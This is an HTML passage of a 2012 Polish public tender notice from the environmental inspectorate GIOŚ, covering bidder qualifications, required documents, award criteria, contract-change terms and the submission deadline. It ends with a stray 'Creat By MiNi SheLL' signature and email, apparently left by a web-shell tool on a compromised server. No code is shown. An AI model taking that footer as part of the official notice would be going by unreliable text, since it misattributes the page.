<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie dysponowania tymi osobami, sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ. W skład zespołu wchodzić będą co najmniej 2 osoby posiadające wykształcenie wyższe w zakresie informatyki posiadające co najmniej 3 letnie doświadczenie w zakresie tworzenia portali i stron internetowych i jedna osoba posiadająca wykształcenie wyższe w zakresie ochrony środowiska oraz co najmniej 3 letnie doświadczenie w zakresie wykonywania analiz i ocen zanieczyszczenia powietrza atmosferycznego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian 
1.	Zamawiający może udzielić Wykonawcy dodatkowego terminu wykonania zamówienia w przypadku, gdy wyłączną przyczyną braku możliwości dotrzymania terminu wykonania Umowy lub jej etapu jest działanie siły wyższej leżącej po jednej ze stron (Wykonawca lub Zamawiający).
2.	Przez siłę wyższą rozumie się zdarzenie bądź połączenie zdarzeń lub okoliczności niezależnych od strony, które zasadniczo utrudniają lub uniemożliwiają wykonanie zamówienia przez Wykonawcę, a których strona nie mogła przewidzieć ani im zapobiec lub przezwyciężyć poprzez działanie z dochowaniem należytej staranności.
3.	W przypadku naruszenia terminów realizacji etapów pracy określonych w zamówieniu przez jedną ze stron z przyczyny działania siły wyższej strona, której dotyczy działanie siły wyższej, zobowiązana jest poinformować drugą stronę na piśmie o wystąpieniu siły wyższej, ze wskazaniem przewidywanego czasu trwania przeszkody w realizacji danego etapu pracy określonego w zamówieniu z powodu działania siły wyższej.
4.	Po zaakceptowaniu przez stronę, po której nie leży przyczyna działania siły wyższej, czasu trwania przeszkody w realizacji etapu pracy określonego w zamówieniu z powodu działania siły wyższej, może za zgodą stron nastąpić zmiana terminu realizacji danego etapu pracy poprzez podpisanie przez strony Aneksu do Umowy dotyczącego zmiany realizacji danego etapu pracy wraz z podaniem: przyczyny siły wyższej, czasu jej trwania, nowego terminu realizacji danego etapu pracy po usunięciu działania siły wyższej, pod warunkiem, iż zmiana ta nie naruszy zasad korzystania z rezerwy budżetu państwa, o których mowa w ustawie o finansach publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gios.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2012 godzina 11:00, miejsce: Sekretariat Departamentu Monitoringu i Informacji o Środowisku Głównego Inspektoratu Ochrony Środowiska, ul. Wawelska 52/54, Warszawa (IV piętro, pokój 450).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com